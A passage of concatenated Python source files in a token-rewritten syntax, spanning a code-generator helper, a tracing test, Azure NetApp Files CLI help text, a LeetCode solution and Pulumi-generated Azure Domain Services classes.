'name')<block_start>p['default_value']=param.default_value.name<block_end><else_stmt><block_start>p['default_value']=param.default_value<block_end><block_end><elif_stmt>hasattr(param.param_type 'default_value')<block_start><if_stmt>hasattr(param.param_type.default_value 'name')<block_start>p['default_value']=param.param_type.default_value.name<block_end><else_stmt><block_start>p['default_value']=param.param_type.default_value<block_end><block_end><if_stmt>hasattr(param.param_type 'min_value')<block_start>p['num_min_value']=param.param_type.min_value<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'min_value')<block_start>p['num_min_value']=param.param_type.element_type.min_value<block_end><if_stmt>hasattr(param.param_type 'max_value')<block_start>p['num_max_value']=param.param_type.max_value<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'max_value')<block_start>p['num_max_value']=param.param_type.element_type.max_value<block_end><if_stmt>hasattr(param.param_type 'min_length')<block_start>p['string_min_length']=param.param_type.min_length<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'min_length')<block_start>p['string_min_length']=param.param_type.element_type.min_length<block_end><if_stmt>hasattr(param.param_type 'max_length')<block_start>p['string_max_length']=param.param_type.max_length<block_end><elif_stmt>hasattr(param.param_type 'element_type')<and>hasattr(param.param_type.element_type 'max_length')<block_start>p['string_max_length']=param.param_type.element_type.max_length<block_end># Filter None values filtered_values={k:v<for>k,v p.items()<if>v<is><not><none>}<line_sep><return>filtered_values<block_end>@staticmethod<def_stmt>replace_sync name<block_start>""" :param name: string with item name :return: string with replaced 'sync' to 'Sdl' """<if_stmt>name<block_start><return>re.sub(r'^([sS])ync(.+)$' r'\1dl\2' name)<block_end><return>name<block_end><def_stmt>replace_keywords self name:str=''<arrow>str<block_start>""" if :param name in self.key_words, :return: name += 'Param' :param name: string with item name """<if_stmt>any(map(<lambda>k:re.search(r'^(get|set|key_)?{}$'.format(name.casefold()) k) self.key_words))<block_start>origin=name<if_stmt>name.isupper()<block_start>name<augadd>'_PARAM'<block_end><else_stmt><block_start>name<augadd>'Param'<block_end>self.logger.debug('Replacing %s with %s' origin name)<block_end><return>self.replace_sync(name)<block_end><def_stmt>extract_type self param<block_start>""" Evaluate and extract type :param param: sub-element Param of element from initial Model :return: string with sub-element type """<def_stmt>evaluate t1<block_start><if_stmt>isinstance(t1 Struct)<or>isinstance(t1 Enum)<block_start>name=t1.name<line_sep><return>name<block_end><else_stmt><block_start><return>type(t1).__name__<block_end><block_end><if_stmt>isinstance(param.param_type Array)<block_start><return>'List<{}>'.format(evaluate(param.param_type.element_type))<block_end><else_stmt><block_start><return>evaluate(param.param_type)<block_end><block_end><block_end>
<import_from_future_stmt> print_function<def_stmt>one a=123 b='234' c={'3':[4 '5']}<block_start><for_stmt>i range(1)# one <block_start>a=b=c['side']='effect'<line_sep>two()<block_end><block_end><def_stmt>two a=123 b='234' c={'3':[4 '5']}<block_start><for_stmt>i range(1)# two <block_start>a=b=c['side']='effect'<line_sep>three()<block_end><block_end><def_stmt>three a=123 b='234' c={'3':[4 '5']}<block_start><for_stmt>i range(1)# three <block_start>a=b=c['side']='effect'<line_sep>four()<block_end><block_end><def_stmt>four a=123 b='234' c={'3':[4 '5']}<block_start><for_stmt>i range(1)# four <block_start>a=b=c['side']='effect'<line_sep>five()<block_end><block_end><def_stmt>five a=123 b='234' c={'3':[4 '5']}<block_start>six()<line_sep>six()<line_sep>six()<line_sep>a=b=c['side']=in_five='effect'<for_stmt>i range(1)# five <block_start><return>i<block_end><block_end># five <def_stmt>six <block_start><pass><block_end><if_stmt>__name__<eq>"__main__"<block_start><import_from_stmt>hunter *<import_from_stmt>utils DebugCallPrinter<line_sep>trace(Backlog(stack=15 vars=<true> action=DebugCallPrinter(' ['<concat>'backlog'<concat>']') function='five').filter(~Q(function='six')) action=DebugCallPrinter)<line_sep>one()<line_sep>one()# make sure Backlog is reusable (doesn't have storage side-effects) stop()<block_end>
<import_from_future_stmt> absolute_import division print_function unicode_literals<import_stmt>os<line_sep>print("VAR is '{}'".format(os.environ["VAR"]))<line_sep>
# coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- <import_from_stmt>knack.help_files helps<line_sep># pylint: disable=line-too-long helps['netappfiles']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Resources. """<line_sep># account helps['netappfiles account']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Account Resources. """<line_sep>helps['netappfiles account create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update). parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account examples: - name: Create an ANF account text: > az netappfiles account create -g group --account-name name -l location """<line_sep>helps['netappfiles account set']=""" type: command short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty []. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 - name: Remove the active directory from the ANF account text: > az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2 """<line_sep>helps['netappfiles account update']=""" type: command short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 """<line_sep>helps['netappfiles account delete']=""" type: command short-summary: Delete the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Delete an ANF account text: > az netappfiles account delete -g group --account-name name """<line_sep>helps['netappfiles account list']=""" type: command short-summary: List ANF accounts. examples: - name: List ANF accounts within a resource group text: > az netappfiles account list -g group """<line_sep>helps['netappfiles account show']=""" type: command short-summary: Get the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Get an ANF account text: > az netappfiles account show -g group --account-name name """<line_sep># pools helps['netappfiles pool']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Pool Resources. """<line_sep>helps['netappfiles pool create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Create an ANF pool text: > az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium" """<line_sep>helps['netappfiles pool update']=""" type: command short-summary: Update the tags of the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Update specific values for an ANF pool text: > az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]' """<line_sep>helps['netappfiles pool delete']=""" type: command short-summary: Delete the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Delete an ANF pool text: > az netappfiles pool delete -g group --account-name aname --pool-name pname """<line_sep>helps['netappfiles pool list']=""" type: command short-summary: L:ist the ANF pools for the specified account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: List the pools for the ANF account text: > az netappfiles pool list -g group --account-name name """<line_sep>helps['netappfiles pool show']=""" type: command short-summary: Get the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Get an ANF pool text: > az netappfiles pool show -g group --account-name aname --pool-name pname """<line_sep># volumes helps['netappfiles volume']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Volume Resources. """<line_sep>helps['netappfiles volume create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB" - name: --creation-token type: string short-summary: A unique file path identifier, from 1 to 80 characters - name: --subnet-id type: string short-summary: The subnet identifier - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume create -g group --account-name aname --pool-name pname --volume-name vname -l location --service-level "Premium" --usage-threshold 107374182400 --creation-token "<PASSWORD>" --subnet-id "/subscriptions/mysubsid/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet/subnets/default" --export-policy '[{"allowed_clients":"0.0.0.0/0", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """<line_sep>helps['netappfiles volume update']=""" type: command short-summary: Update the specified ANF volume with the values provided. Unspecified values will remain unchanged. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB" - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume update -g group --account-name aname --pool-name pname --volume-name vname --service-level level --usage-threshold 107374182400 --tags 'key[=value] key[=value]' --export-policy '[{"allowed_clients":"1.2.3.0/24", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}, {"allowed_clients":"1.2.4.0/24", "rule_index": "2", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """<line_sep>helps['netappfiles volume delete']=""" type: command short-summary: Delete the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: Delete an ANF volume text: > az netappfiles volume delete -g group --account-name aname --pool-name pname --volume-name vname """<line_sep>helps['netappfiles volume list']=""" type: command short-summary: List the ANF Pools for the specified account. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: List the ANF volumes of the pool text: > az netappfiles volume list -g group --account-name aname --pool-name pname """<line_sep>helps['netappfiles volume show']=""" type: command short-summary: Get the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF pool examples: - name: Returns the properties of the given ANF volume text: > az netappfiles volume show -g group --account-name aname --pool-name pname --volume-name vname """<line_sep># mounttargets helps['netappfiles mount-target']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Mount Target Resources. """<line_sep>helps['netappfiles mount-target list']=""" type: command short-summary: List the mount targets of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF pool examples: - name: list the mount targets of an ANF volume text: > az netappfiles mount-target list -g group --account-name aname --pool-name pname --volume-name vname """<line_sep># snapshots helps['netappfiles snapshot']=""" type: group short-summary: Manage Azure NetApp Files (ANF) Snapshot Resources. """<line_sep>helps['netappfiles snapshot create']=""" type: command short-summary: Create a new Azure NetApp Files (ANF) snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot - name: --file-system-id type: string short-summary: The uuid of the volume examples: - name: Create an ANF snapshot text: > az netappfiles snapshot create -g group --account-name account-name --pool-name pname --volume-name vname --snapshot-name sname -l location --file-system-id volume-uuid """<line_sep>helps['netappfiles snapshot delete']=""" type: command short-summary: Delete the specified ANF snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Delete an ANF snapshot text: > az netappfiles snapshot delete -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """<line_sep>helps['netappfiles snapshot list']=""" type: command short-summary: List the snapshots of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: list the snapshots of an ANF volume text: > az netappfiles snapshot list -g group --account-name aname --pool-name pname --volume-name vname """<line_sep>helps['netappfiles snapshot show']=""" type: command short-summary: Get the specified ANF snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Return the specified ANF snapshot text: > az netappfiles snapshot show -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """<line_sep>
# https://leetcode.com/problems/lucky-numbers-in-a-matrix <def_stmt>lucky_numbers matrix<block_start>all_lucky_numbers,all_mins=[] []<for_stmt>row matrix<block_start>found_min,col_index=float('Inf') -1<for_stmt>index,column enumerate(row)<block_start><if_stmt>column<l>found_min<block_start>found_min=column<line_sep>col_index=index<block_end><block_end>all_mins.append([found_min col_index])<block_end><for_stmt>a_min all_mins<block_start>[min_value min_column]=a_min<line_sep>maximum=float('-Inf')<for_stmt>index range(len(matrix))<block_start>num=matrix[index][min_column]<line_sep>maximum=max(num maximum)<block_end><if_stmt>maximum<eq>min_value<block_start>all_lucky_numbers.append(min_value)<block_end><block_end><return>all_lucky_numbers<block_end>
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** <import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['ServiceInitialReplicaSet' 'ServiceNotifications' 'ServiceSecureLdap' 'ServiceSecurity' 'GetServiceNotificationResult' 'GetServiceReplicaSetResult' 'GetServiceSecureLdapResult' 'GetServiceSecurityResult' ]<line_sep>@pulumi.output_type<class_stmt>ServiceInitialReplicaSet(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"subnetId"<block_start>suggest="subnet_id"<block_end><elif_stmt>key<eq>"domainControllerIpAddresses"<block_start>suggest="domain_controller_ip_addresses"<block_end><elif_stmt>key<eq>"externalAccessIpAddress"<block_start>suggest="external_access_ip_address"<block_end><elif_stmt>key<eq>"serviceStatus"<block_start>suggest="service_status"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceInitialReplicaSet. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceInitialReplicaSet.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceInitialReplicaSet.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * subnet_id:str domain_controller_ip_addresses:Optional[Sequence[str]]=<none> external_access_ip_address:Optional[str]=<none> id:Optional[str]=<none> location:Optional[str]=<none> service_status:Optional[str]=<none><block_start>""" :param str subnet_id: The ID of the subnet in which to place the initial replica set. :param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the initial replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location where the Domain Service exists. Changing this forces a new resource to be created. :param str service_status: The current service status for the initial replica set. """<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<if_stmt>domain_controller_ip_addresses<is><not><none><block_start>pulumi.set(__self__ "domain_controller_ip_addresses" domain_controller_ip_addresses)<block_end><if_stmt>external_access_ip_address<is><not><none><block_start>pulumi.set(__self__ "external_access_ip_address" external_access_ip_address)<block_end><if_stmt>id<is><not><none><block_start>pulumi.set(__self__ "id" id)<block_end><if_stmt>location<is><not><none><block_start>pulumi.set(__self__ "location" location)<block_end><if_stmt>service_status<is><not><none><block_start>pulumi.set(__self__ "service_status" service_status)<block_end><block_end>@property@pulumi.getter(name="subnetId")<def_stmt>subnet_id self<arrow>str<block_start>""" The ID of the subnet in which to place the initial replica set. """<line_sep><return>pulumi.get(self "subnet_id")<block_end>@property@pulumi.getter(name="domainControllerIpAddresses")<def_stmt>domain_controller_ip_addresses self<arrow>Optional[Sequence[str]]<block_start>""" A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. """<line_sep><return>pulumi.get(self "domain_controller_ip_addresses")<block_end>@property@pulumi.getter(name="externalAccessIpAddress")<def_stmt>external_access_ip_address self<arrow>Optional[str]<block_start>""" The publicly routable IP address for the domain controllers in the initial replica set. """<line_sep><return>pulumi.get(self "external_access_ip_address")<block_end>@property@pulumi.getter<def_stmt>id self<arrow>Optional[str]<block_start>""" The ID of the Domain Service. """<line_sep><return>pulumi.get(self "id")<block_end>@property@pulumi.getter<def_stmt>location self<arrow>Optional[str]<block_start>""" The Azure location where the Domain Service exists. Changing this forces a new resource to be created. """<line_sep><return>pulumi.get(self "location")<block_end>@property@pulumi.getter(name="serviceStatus")<def_stmt>service_status self<arrow>Optional[str]<block_start>""" The current service status for the initial replica set. """<line_sep><return>pulumi.get(self "service_status")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceNotifications(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"additionalRecipients"<block_start>suggest="additional_recipients"<block_end><elif_stmt>key<eq>"notifyDcAdmins"<block_start>suggest="notify_dc_admins"<block_end><elif_stmt>key<eq>"notifyGlobalAdmins"<block_start>suggest="notify_global_admins"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceNotifications. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceNotifications.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceNotifications.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * additional_recipients:Optional[Sequence[str]]=<none> notify_dc_admins:Optional[bool]=<none> notify_global_admins:Optional[bool]=<none><block_start>""" :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. :param bool notify_dc_admins: Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. :param bool notify_global_admins: Whether to notify all Global Administrators when there are alerts in the managed domain. """<if_stmt>additional_recipients<is><not><none><block_start>pulumi.set(__self__ "additional_recipients" additional_recipients)<block_end><if_stmt>notify_dc_admins<is><not><none><block_start>pulumi.set(__self__ "notify_dc_admins" notify_dc_admins)<block_end><if_stmt>notify_global_admins<is><not><none><block_start>pulumi.set(__self__ "notify_global_admins" notify_global_admins)<block_end><block_end>@property@pulumi.getter(name="additionalRecipients")<def_stmt>additional_recipients self<arrow>Optional[Sequence[str]]<block_start>""" A list of additional email addresses to notify when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "additional_recipients")<block_end>@property@pulumi.getter(name="notifyDcAdmins")<def_stmt>notify_dc_admins self<arrow>Optional[bool]<block_start>""" Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_dc_admins")<block_end>@property@pulumi.getter(name="notifyGlobalAdmins")<def_stmt>notify_global_admins self<arrow>Optional[bool]<block_start>""" Whether to notify all Global Administrators when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_global_admins")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceSecureLdap(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"pfxCertificate"<block_start>suggest="pfx_certificate"<block_end><elif_stmt>key<eq>"pfxCertificatePassword"<block_start>suggest="pfx_certificate_password"<block_end><elif_stmt>key<eq>"certificateExpiry"<block_start>suggest="certificate_expiry"<block_end><elif_stmt>key<eq>"certificateThumbprint"<block_start>suggest="certificate_thumbprint"<block_end><elif_stmt>key<eq>"externalAccessEnabled"<block_start>suggest="external_access_enabled"<block_end><elif_stmt>key<eq>"publicCertificate"<block_start>suggest="public_certificate"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceSecureLdap. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceSecureLdap.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceSecureLdap.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * enabled:bool pfx_certificate:str pfx_certificate_password:str certificate_expiry:Optional[str]=<none> certificate_thumbprint:Optional[str]=<none> external_access_enabled:Optional[bool]=<none> public_certificate:Optional[str]=<none><block_start>""" :param bool enabled: Whether to enable secure LDAP for the managed domain. Defaults to `false`. :param str pfx_certificate: The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). :param str pfx_certificate_password: The password to use for decrypting the PKCS#12 bundle (PFX file). :param bool external_access_enabled: Whether to enable external access to LDAPS over the Internet. Defaults to `false`. """<line_sep>pulumi.set(__self__ "enabled" enabled)<line_sep>pulumi.set(__self__ "pfx_certificate" pfx_certificate)<line_sep>pulumi.set(__self__ "pfx_certificate_password" pfx_certificate_password)<if_stmt>certificate_expiry<is><not><none><block_start>pulumi.set(__self__ "certificate_expiry" certificate_expiry)<block_end><if_stmt>certificate_thumbprint<is><not><none><block_start>pulumi.set(__self__ "certificate_thumbprint" certificate_thumbprint)<block_end><if_stmt>external_access_enabled<is><not><none><block_start>pulumi.set(__self__ "external_access_enabled" external_access_enabled)<block_end><if_stmt>public_certificate<is><not><none><block_start>pulumi.set(__self__ "public_certificate" public_certificate)<block_end><block_end>@property@pulumi.getter<def_stmt>enabled self<arrow>bool<block_start>""" Whether to enable secure LDAP for the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "enabled")<block_end>@property@pulumi.getter(name="pfxCertificate")<def_stmt>pfx_certificate self<arrow>str<block_start>""" The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). """<line_sep><return>pulumi.get(self "pfx_certificate")<block_end>@property@pulumi.getter(name="pfxCertificatePassword")<def_stmt>pfx_certificate_password self<arrow>str<block_start>""" The password to use for decrypting the PKCS#12 bundle (PFX file). """<line_sep><return>pulumi.get(self "pfx_certificate_password")<block_end>@property@pulumi.getter(name="certificateExpiry")<def_stmt>certificate_expiry self<arrow>Optional[str]<block_start><return>pulumi.get(self "certificate_expiry")<block_end>@property@pulumi.getter(name="certificateThumbprint")<def_stmt>certificate_thumbprint self<arrow>Optional[str]<block_start><return>pulumi.get(self "certificate_thumbprint")<block_end>@property@pulumi.getter(name="externalAccessEnabled")<def_stmt>external_access_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable external access to LDAPS over the Internet. Defaults to `false`. """<line_sep><return>pulumi.get(self "external_access_enabled")<block_end>@property@pulumi.getter(name="publicCertificate")<def_stmt>public_certificate self<arrow>Optional[str]<block_start><return>pulumi.get(self "public_certificate")<block_end><block_end>@pulumi.output_type<class_stmt>ServiceSecurity(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"ntlmV1Enabled"<block_start>suggest="ntlm_v1_enabled"<block_end><elif_stmt>key<eq>"syncKerberosPasswords"<block_start>suggest="sync_kerberos_passwords"<block_end><elif_stmt>key<eq>"syncNtlmPasswords"<block_start>suggest="sync_ntlm_passwords"<block_end><elif_stmt>key<eq>"syncOnPremPasswords"<block_start>suggest="sync_on_prem_passwords"<block_end><elif_stmt>key<eq>"tlsV1Enabled"<block_start>suggest="tls_v1_enabled"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in ServiceSecurity. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>ServiceSecurity.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>ServiceSecurity.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * ntlm_v1_enabled:Optional[bool]=<none> sync_kerberos_passwords:Optional[bool]=<none> sync_ntlm_passwords:Optional[bool]=<none> sync_on_prem_passwords:Optional[bool]=<none> tls_v1_enabled:Optional[bool]=<none><block_start>""" :param bool ntlm_v1_enabled: Whether to enable legacy NTLM v1 support. Defaults to `false`. :param bool sync_kerberos_passwords: Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. :param bool sync_ntlm_passwords: Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. :param bool sync_on_prem_passwords: Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. :param bool tls_v1_enabled: Whether to enable legacy TLS v1 support. Defaults to `false`. """<if_stmt>ntlm_v1_enabled<is><not><none><block_start>pulumi.set(__self__ "ntlm_v1_enabled" ntlm_v1_enabled)<block_end><if_stmt>sync_kerberos_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_kerberos_passwords" sync_kerberos_passwords)<block_end><if_stmt>sync_ntlm_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_ntlm_passwords" sync_ntlm_passwords)<block_end><if_stmt>sync_on_prem_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_on_prem_passwords" sync_on_prem_passwords)<block_end><if_stmt>tls_v1_enabled<is><not><none><block_start>pulumi.set(__self__ "tls_v1_enabled" tls_v1_enabled)<block_end><block_end>@property@pulumi.getter(name="ntlmV1Enabled")<def_stmt>ntlm_v1_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable legacy NTLM v1 support. Defaults to `false`. """<line_sep><return>pulumi.get(self "ntlm_v1_enabled")<block_end>@property@pulumi.getter(name="syncKerberosPasswords")<def_stmt>sync_kerberos_passwords self<arrow>Optional[bool]<block_start>""" Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_kerberos_passwords")<block_end>@property@pulumi.getter(name="syncNtlmPasswords")<def_stmt>sync_ntlm_passwords self<arrow>Optional[bool]<block_start>""" Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_ntlm_passwords")<block_end>@property@pulumi.getter(name="syncOnPremPasswords")<def_stmt>sync_on_prem_passwords 